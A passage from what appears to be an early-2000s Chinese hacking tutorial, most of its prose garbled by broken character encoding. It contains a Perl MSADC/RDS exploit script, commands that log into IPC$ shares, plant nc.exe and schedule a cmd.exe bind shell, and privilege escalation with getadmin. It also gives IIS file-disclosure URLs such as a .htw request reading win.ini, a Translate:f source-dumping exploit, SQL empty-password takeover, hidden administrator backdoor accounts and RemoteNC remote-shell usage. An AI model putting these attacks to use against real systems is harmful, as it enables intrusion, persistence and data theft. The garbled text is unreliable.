elsif ($p[1]==3){
if(run_query("$p[3]")){
print "Success!\n";}else{ print "failed\n"; }}
elsif ($p[1]==4){
if(run_query($drvst . "$p[3]")){
print "Success!\n"; }else{ print "failed\n"; }}
exit;}

##############################################################################

sub create_table{
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table 'AZZ' already exists/;
return 0;}

##############################################################################

sub known_dsn{
# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
my @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");

foreach $dSn (@dsns){
print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
print "$dSn successful\n";
if(run_query("DSN=$dSn")){
print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; }else{
print "Something's borked. Use verbose next time\n";}}}print "\n";}

##############################################################################

sub is_access{
my ($in)=@_;
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}

##############################################################################

sub run_query{
my ($in)=@_;
$reqlen=length( make_req(3,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(3,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}

##############################################################################

sub known_mdb{
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";

# this is sparse, because I don't know of many
my @sysmdbs=( "\\catroot\\icatalog.mdb",
"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\certmdb.mdb",
"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%

my @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
"\\cfusion\\cfapps\\forums\\forums_.mdb",
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
"\\cfusion\\cfapps\\security\\realm_.mdb",
"\\cfusion\\cfapps\\security\\data\\realm.mdb",
"\\cfusion\\database\\cfexamples.mdb",
"\\cfusion\\database\\cfsnippets.mdb",
"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
"\\cfusion\\brighttiger\\database\\cleam.mdb",
"\\cfusion\\database\\smpolicy.mdb",
"\\cfusion\\database\cypress.mdb",
"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
"\\website\\cgi-win\\dbsample.mdb",
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
); #these are just
foreach $drive (@drives){
foreach $dir (@dirs){
foreach $mdb (@sysmdbs){
print ".";
if(create_table($drv . $drive . ":\\" . $dir . $mdb)){
print "\n" . $drive . ":\\" . $dir . $mdb . " successful\n";
if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
print "Success!\n"; save (4,4,$drive . ":\\" . $dir . $mdb,""); exit;
}else{ print "Something's borked. Use verbose next time\n"; }}}}}

foreach $drive (@drives){
foreach $mdb (@mdbs){
print ".";
if(create_table($drv . $drive . $dir . $mdb)){
print "\n" . $drive . $dir . $mdb . " successful\n";
if(run_query($drv . $drive . $dir . $mdb)){
print "Success!\n"; save (4,4,$drive . $dir . $mdb,""); exit;
}else{ print "Something's borked. Use verbose next time\n"; }}}}
}

##############################################################################

sub hork_idx{
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw2(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/\x00//g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
$d{"$1$2"}="";}
foreach $c (keys %d){ print "$c\n"; }
}else{print "Index server doesn't seem to be installed.\n"; }}

##############################################################################

sub dsn_dict{
open(IN, "<$args{e}") || die("Can't open external dictionary\n");
while( ){
$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
print "$dSn successful\n";
if(run_query("DSN=$dSn")){
print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; }else{
print "Something's borked. Use verbose next time\n";}}}
print "\n"; close(IN);}

##############################################################################

sub sendraw2{ # ripped and modded from whisker
sleep($delay); # it's a DoS on the server! At least on mine...
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
print "Connected. Getting data";
open(OUT,">raw.out"); my @in;
select(S); $|=1; print $pstr;
while(<S> ){ print OUT $_; push @in, $_; print STDOUT ".";}
close(OUT); select(STDOUT); close(S); return @in;
}else{ die("Can't connect...\n"); }}

##############################################################################

sub content_start{ # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++){
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/){ $c++; }
else{ return $c+1; }}}
return -1;}# it should never get here actually

##############################################################################

sub funky{
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO miscofiguration message\nAborting.\n";
exit;}
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}
if($error=~/specified Handler has denied Access/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}}

##############################################################################

sub has_msadc{
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
my $base=content_start(@results);
return 1 if($results[$base]=~/Content-Type: application\/x-varg/);
return 0;}

-------------IPC¤J«I--------------

IPC¬OInternet Process ConnectionªºÁY¼g¡A¤]´N¬O»·ºÝºô¸ô³s±µ¡C¥¦¥»¨Ó¬OUNIXªº¶iµ{¶¡³q°Tªº·N«ä¡A³oùاڭ̻¡ªº¬OWindows¤Uªº¢×¢Þ¢Ñ¡A¥L¥D­n¬O¦@¥Î¨ã¦WºÞ¹Dªº¸ê·½¡A¥¦¹ï©óµ{¦¡¶¡ªº³q°T«Ü­«­n¡C¦b»·ºÝºÞ²z¹q¸£©M¬d¬Ý¹q¸£ªº¦@¥Î¸ê·½®É¨Ï¥Î¡C
¥¦¬OWindows NT¤ÎWindows 2000¯S¦³ªº¤@¶µ¥\¯à¡A¯SÂI¬O¦b¦P¤@®É¶¡¤º¡A¨â­ÓIP¤§¶¡¥u¤¹³\«Ø¥ß¤@­Ó³s±µ¡C¦n¤F¡A¼o¸Ü¤Ö»¡¡A²{¦b¶i¤J¥DÃD¡C

¦p¦ó§ä¨ì¨ã¦³IPCº|¬}ªº¥D¾÷©O¡H¥Î¤pº_ªº¬y¥ú2000¡A§ä¨ì³o¼Ëªº¥D¾÷¹ê¦b¬O¤Ó²³æ¤F¡A¨ãÅé¾Þ§@§Ú´N¤£»¡¤F¡A¤j®a¥i¥H°Ñ¦Ò¸Ó³nÅ骺»¡©ú¤åÀÉ¡C

¦n¤F¡A°²³]§Ú­Ì¤w¸g§ä¨ì¤F¤@¥x³o¼Ëªº¥D¾÷¡A¦ì§}¬O139.223.200.xxx¡AºÞ²z­û±b¸¹¬OAdministrator¡A±K½X¬O123456¡C¶i¤J©R¥O¦æ¤è¦¡¡A¥¿¦¡¶}¤u¡C»Ý­n»¡©úªº¬O¡A¥H¤U¾Þ§@³£¬O¦b¥Ø¼Ð¥D¾÷¨S¦³¸T¤î»·ºÝIPC$³s±µ©M±Ò°ÊScheduleªA°Èªº²z·Q±¡ªp¤U¶i¦æªº¡C

F:\>net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator"
©R¥O¦¨¥\§¹¦¨¡C

F:\>copy nc.exe \\139.223.200.xxx\admin$
¤w½Æ»s 1 ­ÓÀÉ¡C

F:\>net time \\139.223.200.xxx
\\139.223.200.xxx ªº·í«e®É¶¡¬O 2000/12/25 ¤W¤È 10:25
¦b \\139.223.200.xxx ªº¥»¦a®É¶¡ (GMT - 07:00) ¬O 2000/12/25 ¤W¤È10:35
©R¥O¦¨¥\§¹¦¨¡C

F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
·s¼W¥[¤F¤@¶µ§@·~¡A¨ä§@·~ ID = 0

F:\>telnet 139.223.200.xxx 1234

¤W­±ªº©R¥O«Ü²³æ¡A§A¥u­n°Ñ¦Ò¤@¤Unet¡Aat©Mncªº¥Îªk´N¥i¥H¤F¡C³o¼Ë¡A§Ú­Ì´Nµn¤W¤F»·ºÝªº¥D¾÷¡C³Ì²z·Qªº±¡ªp¬O³o¼Ëªº¡A¦ý¬O¡A¤]³\§A·|¹J¨ì¥Ø¼Ð¥D¾÷ªºScheduleªA°È¨S¦³±Ò°Êªº±¡ªp¡A¨º»ò¡Aat©R¥O´N¤£¯à¥Î¤F¡A§Ú­Ì´N»Ý­n¼W¥[¥H¤U¨BÆJ¡C

F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
ªA°È¤´¥¼±Ò°Ê¡C

F:\>netsvc \\139.223.200.xxx schedule /start
Service is running on \\139.223.200.xxx

µn¤W»·ºÝ¥D¾÷¤§«á¡A§Ú­Ì¥i¥H°µ¤°»ò©O¡H³o­nµø³o­Ó±b¸¹ªº³\¥iÅv¥H¤Î¸Ó¥D¾÷ªº¦w¥þµ¦²¤¨Ó¨M©w¡C¦pªG§Aªº³\¥iÅv¤£°÷ªº¸Ü¡A¥i¥H¸Õ¸Õ¤U­±ªº¨BÆJ¡C­º¥ý¦b¥»¦a°õ¦æ¤U­±ªº©R¥O¡C
F:\>copy getadmin.exe \\139.223.200.xxx\admin$
¤w½Æ»s 1 ­ÓÀÉ¡C
F:\>copy gasys.dll \\139.223.200.xxx\admin$
¤w½Æ»s 1 ­ÓÀÉ¡C
¨ä¦¸¡A¦b»·ºÝ¥D¾÷¹B¦æ¤U­±ªº©R¥O¡C
C:\WINNT\system32>getadmin
¦pªG¦¨¥\ªº¸Ü¡A§A´N¬O³o¥x¥D¾÷ªººÞ²z­û¤F¡A³\¥iÅv°÷¤j¤F§a¡H¡G-¡^


---------------webhits.dll & .htw----------------
¡@¡@³o­Óhit-highligting¥\¯à¬O¥ÑIndex Server´£¨Ñªº¤¹³\¤@­ÓWEB¥Î¤á¦b¤åÀɤWhighlighted¡]¬ð¥X¡^¨ä­ì©l·j¯Áªº±ø¥Ø¡A³o­Ó¤åÀɪº¦W¦r³q¹LÅܼÆCiWebhitsfile¶Ç»¼µ¹.htw¤å¥ó¡AWebhits.dll¬O¤@­ÓISAPIÀ³¥Îµ{¦¡¨Ó³B²z½Ð¨D¡A¥´¶}Àɨêð¦^µ²ªG¡A·í¥Î¤á±±¨î¤FCiWebhitsfile°Ñ¼Æ¶Ç»¼µ¹.htw®É¡A¥L­Ì´N¥i¥H½Ð¨D¥ô·NÀÉ¡Aµ²ªG´N¬O¾É­P¥i¥H¬d¬ÝASP·½½X©M¨ä¥L¸}¥»Àɤº®e¡C­nÁA¸Ñ§A¬O§_¦s¦b³o­Óº|¬}¡A§A¥i¥H½Ð¨D¦p¤U±ø¥Ø¡G
http://www.¥Øªº¾÷.com/nosuchfile.htw
¡@¡@¦pªG§A±q¦øªA¾¹ºÝÀò±o¦p¤U¸ê°T¡G
format of the QUERY_STRING is invalid
³o´Nªí¥Ü§A¦s¦b³o­Óº|¬}¡C
¡@¡@³o­Ó°ÝÃD¥D­n´N¬Owebhits.dllÃöÁp¤F.htwÀɪº¬M®g¡A©Ò¥H§A¥u­n¨ú®ø³o­Ó¬M®g´N¯àÁקK³o­Óº|¬}¡A§A¥i¥H¦b§A»{¬°¦³º|¬}ªº¨t²Î¤¤·j¯Á.htwÀÉ¡A¤@¯ë·|µo²{¦p¤Uªºµ{¦¡¡G
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (³o­Ó¤@¯ë¬°loopback¨Ï¥Î)
¡@¡@§ðÀ»ªÌ¥i¥H¨Ï¥Î¦p¤Uªº¤èªk¨Ó³X°Ý¨t²Î¤¤Àɪº¤º®e¡G
http://www.¥Øªº¾÷.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
¡@¡@´N·|¦b¦³¦¹º|¬}¨t²Î¤¤win.iniÀɪº¤º®e¡C

-------------------ASP Alternate Data Streams(::$DATA)-----------------
¡@¡@$DATA³o­Óº|¬}¬O¦b1998¦~¤¤´Á¤½§Gªº¡A$DATA¬O¦bNTFSÀɨt²Î¤¤¦sÀx¦bÀÉùØ­±ªºmain data streamÄÝ©Ê¡A³q¹L«Ø¥ß¤@­Ó¯S®í®æ¦¡ªºURL¡A´N¥i¯à¨Ï¥ÎIIS¦b¬yÄý¾¹¤¤³X°Ý³o­Ódata stream(¸ê®Æ¬yµ{)¡A³o¼Ë°µ¤]´NÅã¥Ü¤FÀÉ¥N½X¤¤³o¨Çdata stream(¸ê®Æ¬yµ{)©M¥ô¦óÀÉ©Ò¥]§tªº¸ê®Æ¥N½X¡C
¡@¡@¨ä¤¤³o­Óº|¬}»Ý­n¤U­±ªº´X­Ó­­¨î¡A¤@­Ó¬O­nÅã¥Üªº³o­ÓÀɻݭn«O¦s¦bNTFSÀɤÀ°Ï(©¯¦n¬°¤F"¦w¥þ"¦n¦h¦øªA¾¹³]¸m¤FNTFS®æ¦¡)¡A²Ä¤G¬OÀɻݭn³QACL³]¸m¬°¥þ§½¥iŪ¡C¦Ó¥B¥¼±ÂÅv¥Î¤á»Ý­nª¾¹D­n¬d¬ÝÀɮצWªº¦W¦r¡AWIN NT¤¤ªºIIS1.0, 2.0, 3.0©M4.0³£¦s¦b¦¹°ÝÃD¡C·L³n´£¨Ñ¤F¤@­ÓIIS3.0©M4.0ªºª©¥»¸É¤B¡A
­n¬d¬Ý¤@¨Ç.aspÀɪº¤º®e¡A§A¥i¥H½Ð¨D¦p¤UªºURL¡G
¡@¡@http://www.¥Øªº¾÷.com/default.asp::$DATA §A´N±o¨ì¤F·½¥N½X¡C§A­nÁA¸Ñ¤UNTFSÀɨt²Î¤¤ªº¸ê®Æ¬yµ{°ÝÃD¡A§A©Î³\¥i¥H¬Ý¬Ý³o¤å³¹¡G
http://focus.silversand.net/newsite/skill/ntfs.txt


----------------ISM.DLL ½w½ÄºIÂ_º|¬} ----------------
¡@¡@³o­Óº|¬}¦s¦b©óIIS4.0©M5.0¤¤¡A¤¹³\§ðÀ»ªÌ¬d¬Ý¥ô·NÀɤº®e©M·½¥N½X¡C³q¹L¦bÀÉ ¦W«á­±°l¥[ªñ230­Ó+©ÎªÌ?%20?(³o¨Çªí¥ÜªÅ®æ)¨Ã°l¥[?.htr?ªº¯S®í½Ð¨Dµ¹IIS¡A·|¨ÏIIS»{¬°¥Î¤áºÝ½Ð¨Dªº¬O?.htr?¤å¥ó¡A¦Ó.htr¤å¥óªº§À½X¬M®g¨ìISM.DLL ISAPIÀ³¥Îµ{¦¡¡A³o¼ËIIS´N§â³o­Ó.htr½Ð¨DÂà¥æµ¹³o­ÓDLLÀÉ¡AµM«áISM.DLLµ{¦¡§â¶Ç»¼¹L¨ÓªºÀÉ¥´¶}©M°õ¦æ¡A¦ý¦bISM.DLL ºIÂ_¸ê°T¤§«e,½w½Ä°Ïµo°e¤@­ÓÂ_¶}ªº .Htr ¨Ã·|©µ¿ð¤@¬q®É¶¡¨Óªð¦^¤@¨Ç§A­n¥´¶}ªºÀɤº®e¡C¥i¬O­nª`·N¡A°£«D WEB ªA°È°±¤î¨Ã­«±Ò¹L¡A§_«h³o§ðÀ»¥u¯à¦³®Ä°õ¦æ¤@¦¸¡C¦pªG¤w¸gµo°e¹L¤@­Ó .htr ½Ð¨D¨ì¾÷¾¹¤W,¨º»ò³o§ðÀ»·|¥¢®Ä.¥¦¥u¯à¦b ISM.DLL ²Ä¤@¦¸¸Ë¤J°O¾ÐÅé®É¤u§@¡C
http://www.¥Øªº¾÷.com/global.asa%20%20(...¡m=230¡nglobal.asa.htr

----------------¦s¦bªº¤@¨Ç¼É¤O¯}¸Ñ«Â¯Ù.htrµ{¦¡ ------------------
¡@¡@IIS4.0¤¤¥]§t¤@­ÓÄY­«º|¬}´N¬O¤¹³\»·ºÝ¥Î¤á§ðÀ»WEB¦øªA¾¹¤Wªº¥Î¤á±b¸¹¡A´N¬O§AªºWEB¦øªA¾¹¬O³q¹LNAT¨ÓÂà´«¦ì§}ªº¡AÁÙ¥i¥H³Q§ðÀ»¡C¨C­ÓIIS4.0¦w¸Ëªº®É­Ô«Ø¥ß¤@­ÓµêÀÀ¥Ø¿ý/iisadmpwd¡A³o­Ó¥Ø¿ý¥]§t¦h­Ó.htrÀÉ¡A°Î¦W¥Î¤á¤¹³\³X°Ý³o¨ÇÀÉ¡A³o¨ÇÀÉ­è¦n¨S¦³³W©w¥u­­¨î¦bloopback addr(127.0.0.1)¡A½Ð¨D³o¨ÇÀÉ´N¸õ¥X¹ï¸Ü¤è¶ôÅý§A³q¹LWEB¨Ó­×§ï¥Î¤áªº±b¸¹©M±K½X¡C³o­Ó¥Ø¿ýª«²z¬M®g¦b¤U­±ªº¥Ø¿ý¤U¡G
c:\winnt\system32\inetsrv\iisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
³o¼Ë¡A§ðÀ»ªÌ¥i¥H³q¹L¼É¤O¨Ó²q´ú§Aªº±K½X¡C¦pªG§A¨S¦³¨Ï¥Î³o­ÓªA°È¡A½Ð¥ß§Y§R°£³o­Ó¥Ø¿ý¡C


---------------------Translate:f Bug-----------------
¡@¡@³o­Óº|¬}µo§G©ó2000¦~8¤ë15¸¹(www.securityfocus.com/bid/1578)¡A¨ä°ÝÃD¬O¦s¦bOFFICE 2000©MFRONTPAGE 2000Server Extensions¤¤ªºWebDAV¤¤¡A·í¦³¤H½Ð¨D¤@­ÓASP/ASA«áªÌ¨ä¥L¥ô·N¸}¥»ªº®É­Ô¦bHTTP GET¥[¤WTranslate:f§À½X¡A¨Ã¦b½Ð¨DÀÉ«á­±¥[/´N·|Åã¥ÜÀÉ¥N½X¡A·íµM¦b¨S¦³¥´WIN2K SP1¸É¤B¬°«e´£¡C³o­Ó¬OW2Kªºº|¬}¡A¦ý¥Ñ©óFP2000¤]¦w¸Ë¦bIIS4.0¤W¡A¦]¦¹¦bIIS4.0¤W¤]¦³³o­Óº|¬}¡A§A¥i¦Ó¤w¨Ï¥Î¤U­±ªº¸}¥»¨Ó§Q¥Î³o­Óº|¬}¡G
#############################
use IO::Socket; #
my ($port, $sock,$server); #
$size=0; #
#############################
#
$server="$ARGV[0]";
$s="$server";
$port="80";
$cm="$ARGV[1]";
&
sub connect {
if ($#ARGV ¡m 1) {
howto();
exit;
}
$ver="GET /$cm%5C HTTP/1.0
Host: $server
Accept: */*
Translate: f
\n\n";
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error:
$!";
connect(SOCK, $paddr) || die "Error: $!";
send(SOCK, $ver, 0) || die "Can't to send packet: $!";
open(OUT, "¡n$server.txt");
print "Dumping $cm to $server.txt \n";
while(¡mSOCK¡n) {
print OUT ¡mSOCK¡n;
}
sub howto {
print "type as follows: Trans.pl www.¥Øªº¾÷.com codetoview.asp \n\n";
}
close OUT;
$n=0;
$type=2;
close(SOCK);
exit(1); }

¡@¡@§A¥i¥H¨Ï¥Î¤U­±ªº¤èªk¨ÓÀò±o·½¥N½X¡G
Trasn.pl www.¥Øªº¾÷.com default.asp

---------Serv-U FTP-Server v2.5b for Win9x/NT¥»¦a/»·ºÝD.o.S§ðÀ»º|¬} -------------
¦bWindows API ¨ç¼Æ"SHGetPathFromIDList"¤¤³Qµo²{¦s¦b¤@­Ó½w½Ä°Ï·¸¥Xº|¬}¡C³o­Ó¨ç¼Æ±N¤@­Ó±M®×ÃѧO¦rÂà´«¬°¤@­ÓÀɪº¨t²Î¸ô®|¡A¥Î©ó³B²zWindows¤UªºÃìµ²ÀÉ¡C
¥u»Ý­n¤@­Ó·î§ÎªºÃìµ²ÀÉ¡A´N¥i¯à¨Ï¥ô¦ó¥ø¹ÏÂà´«³o­Ó.lnkÃìµ²Àɪºµ{¦¡/¦øªA¾¹±Y¼ì¡C¨Ò¦p¡A½Æ»s¤@­Ó·î§ÎªºÃìµ²Àɨì¹q¸£®à­±¡A±N¾É­P¤£¯à¦b¸Ó¾÷¾¹¤Wµn¿ý¡C
­n¨ÏServ-u FTP¦øªA¾¹±Y¼ì¡A¥u»Ý¤W¸ü¤@­Ó·î§ÎªºÃìµ²Àɨì¥ô¦óServ-uªº¥Ø¿ý¡AµM«á¿é¤JFTP©R¥OLIST¡A¸ÓFTP¦øªA¾¹±N±Y¼ì¡Cª`¡A°ò©óWindows 2000ªº¸Óµ{¦¡¨S¦³³o­Ó°ÝÃD¡C
º|¬}ÀË´ú¤è¦¡°Ñ¦Ò¦p¤U¡G
·î§ÎÃìµ²Àɹê¨Ò¡Ghttp://www.ussrback.com/god.lnk


-------------¸ê®Æ®wªº§ðÀ»------------

¹ï©ó¦s¦b"sa"ªÅ¤f¥O±b¤áªºSQL¦øªA¾¹¨Ó»¡¡A³Ì²«Kªº¤J«I¤èªk¦p¤U¡G

¦b©R¥O¦æ¤è¦¡¤UÁä¤J"sqlexec [IP]"¡A·í¿Ã¹õ¥X²{"Now type dos command(s) to execute :"®É¡A´N¥i¥H¦b¹ï¤èªº¦øªA¾¹¤W°õ¦æ©R¥O¤F¡A¦p¤U©R¥O±N³Ð«Ø¤@­Ó·sªº¥Î¤á±b¸¹¡A¨Ã±N¥¦³]¸m¬°ºÞ²z­û³\¥iÅv¡G net user huodingx /add /expires:never /password:123456
net localgroup "Administrators" /add huodingx
net localgroup "Users" /del huodingx
³o¼Ë§A´N¦badministrators²Õ²K¥[¤F¤@­Óhuodingx±K½X¬°123456ªº±b¤á¡C§A´N¥i¥H¥Î³o­Ó±b¸¹telnet¤W¥h¡C
¦pªG¡A¹ï¤è¥D¾÷ªºtelentªA°È¨S¦³¶}¡A§A´N±µµÛ¿é¤Jnet start telnet¡A¬Ý¨ì¦¨¥\°õ¦æ©R¥O«á¡C¹ï¤è¥D¾÷¤w¸g¶}¤FtelnetªA°È¤F¡A¨þ¨þ¡K¡K¤£¥Î§Ú¦A»¡¤F§a¡I

¹ï©ómysqlªºrootªÅ¤f¥O¡A¤]®t¤£¦h¡A¥Î³o­Ó±b¸¹¥i¥Hµn³°¨ì¥D¾÷ªº3306°ð¡A¥i¥H²K¥[¤@¨Çµ{¦¡ÀɨìscriptsÀɧ¨¡A³q¹Lie°õ¦æ´£¤É³\¥iÅv¡C

¥t¥~¦pªG§A¹ï¸ê®Æ®wªº§ðÀ»·P¿³½ì¡A¥i¥HŪ¤@¤U¨Î¨Îªº±Ðµ{¡]jjgirl.yeah.net¡^

¶Ã¤C¤KÁVªº¼g¤F¤Q´X¤Ñ¡A¦^ÀY¬Ý¬Ý¡A¤]¤£ª¾¹D¼g¤F¨Ç¤°»ò¡CWindowsªºº|¬}¹ê¦b¬O¦h¡A³oùØ¥u¯à²³æªº´y­z¤@¤U¡C¾ã¤Ñ¨nµÛ¿Ã¹õ¡A³o´X¤Ñ²´·ú¦Ñ¬Oıªº¤£¤ÓµÎªA¡C¯u¬O·Q©ñ±ó¡A¥i¬O¤Sıªº¹ï¤£°_³o´X¤Ñªº³Ò°Ê¡C¬Ý¨Ó¥u¯à³o¼Ë¯ó¯ó¦¬³õ¤F¡C

²Ä¥|³¡¤À

==========«áªù¤Î¤é»x=============
¤õ¤B¹ê¦b¬O«Ü²Ö¤F¡A³o¤@¸`¤]¤£¬O¥»¤å©Ò­n敍­zªº­«ÂI¡A´N²³æ¤¶²Ð¤@¤U¤F¡C
----------«áªù------------
³Ì²³æªº²ö¹L©ó¡A²K¥[¤@­Ó¥Î¤á¤F

net user Admin /add /expires:never /password:no
net localgroup "Administrators" /add Admin
net localgroup "Users" /del Admin
¥H«á´N¥i¥H¥Î³o­Ó±b¸¹µn³°¤F¡A«Øij°_¥Îguest³o­ÓÀq»{ªº¡A´N¬O³Qµo²{¤F¡A¤j·NªººÞ²z­û¤]¤£·|¦b·N¡C

¤pº_¨ºùØÁÙ¦³¤@­ÓªFªFremoteNC,§Ú­Ì¨Ó¬Ý¬Ý¥¦ªº»¡©ú¡G
===============================================================
RemoteNC

¨Ï¥Î»¡©ú

¤pº_³nÅé¸ÕÅç«Ç ª©Åv©Ò¦³

http://www.netXeyes.com http://www.netXeyes.org

Dansnow@21cn.com
-------------------------------------------------------------------

Remote NC¬O¦bNT¡þ2000¤¤¹B¦æªº¤@­Ó¤u¨ã¡A©MNCÃþ¦ü¡A¥i¥H»·ºÝ°õ¦æ©R¥O¡C©MNC¤ñ¸ûªºÀuÂI¦b©ó¡G

1¡B»·ºÝ¦w¸Ë±Ò°Ê¡A¤£¨Ì¿à©óScheduleªA°È¡C

2¡B¥i¥H¥H«ü©wªº¥Î¤á¨­¥÷¹B¦æ¡A¤]¥i¥H¥H¨t²Î¥Î¤á¨­¥÷¹B¦æ¡C

3¡B§@¬°ªA°È¦w¸Ë¤_»·ºÝ¨t²Î¡A¨t²Î·|¦Û°Ê±Ò°Ê¡C

4¡B§Ö³t¡C

D:\My Documents\RemoteSVC\Release>RemoteNC.exe

=======RemoteNC Beta 1, Written by Assassin 2001=======
http://www.netXeyes.com http://www.netXeyes.org

Usage: RemoteNC <Password> <Starting Mode>
<Service Name> <Description Name>
<Listen Port> <Control Password> [/OVERWRITE]
: Remote Host IP Address »·ºÝ¥D¾÷IP¦ì§}
: Account name in Remote Host Who Must Has
Administrators Privilege ¥Î¤á¦W(¥²¶·¨ã¦³Administrators³\¥iÅv)
<Password>: Password of Account Name ±K½X
<Start Mode>: LocalSystem or RunAsUser ±Ò°Ê¼Ò¦¡¡GLocalSystem(¨t²Î¥Î¤á) RunAsUser(¥H«e­±«ü©wªº¥Î¤á¨­¥÷¹B¦æ¡A±ÀÂË¡^
<Service Name>: Specify Service Name ªA°Èªº¦WºÙ
<Description>: Description of Service, Displayed in Service Manager ªA°Èªº»¡©ú¡AÅã¥Ü¦bªA°ÈºÞ²z¾¹¤¤¡A¦pªG¦P¦WªA°È¤w¸g¦s¦b¡A±N·|¦w¸Ë¥¢±Ñ¡C
<Listen Port>: Service Listen Port ±Ò°Ê«áºÊÅ¥ªº°ð
<Control Password>: Control Password ±±¨î±K½X

[OVERWRITE]: ¦pªGÀɤw¸g¦s¦b¡A«h±j¨î­«¼g¾ã­ÓÀÉ¡C


¨Ò¤l¡G
D:\My Documents\RemoteSVC\Release>RemoteNC 192.168.0.1 administrator password Runa
sUser "RemoteNC" "Provide Local CMD Redirect" 7 123456

=======RemoteNC Beta 1, Written by Assassin 2001=======
http://www.netXeyes.com http://www.netXeyes.org

[Install Service as RunasUser Mode]
Connecting 192.168.0.1 ..... Done.
Transffer File ..... Done.
Start Service ..... Done.


Now You can Tenlet 192.168.0.1 7 to Connect, Have a Joy Smile ¦w¸Ë¦¨¥\
D:\My Documents\RemoteSVC\Release>
D:\My Documents\RemoteSVC\Release>telnet 192.168.0.1 7 µn¿ý¨ì¨î©wªº°ð
RemoteNC Control Password: **************
===============Banyet Soft Labs. 1995-2001 All Rights Reserved.===============
=========Written by Assassin, Server Edition FluxShadow@21cn.com==============


Microsoft Windows 2000 [Version 5.00.2195]
RemoteNC>net user
User accounts for \\VICTIM
---------------------------------------------------------------------
Administrator Guest IUSR_VICTIM

IWAM_VICTIM NetShowServices TsInternetUser zjf
The command completed successfully.

RemoteNC>net user test test /add
The command completed successfully.

¥Ñ©ó¬O¥HAdministrators²Õªº³\¥iÅv±Ò°Ê¡A©Ò¥H¤£·|¥X²{1312¿ù»~¡C

¦pªG¬O¥H¨t²Î³\¥iÅv±Ò°Ê¡A¦³®É·|¥X²{1312¿ù»~¡A³o´N¬O±ÀÂ˱ĥÎRunasUser¦w¸Ëªº­ì¦]¡C

RemoteNC>

¦pªG¥ÎRunAsUser¼Ò¦¡¦w¸Ë¥¢±Ñ¡A½Ð¥ÎLocalSystem¼Ò¦¡¡C


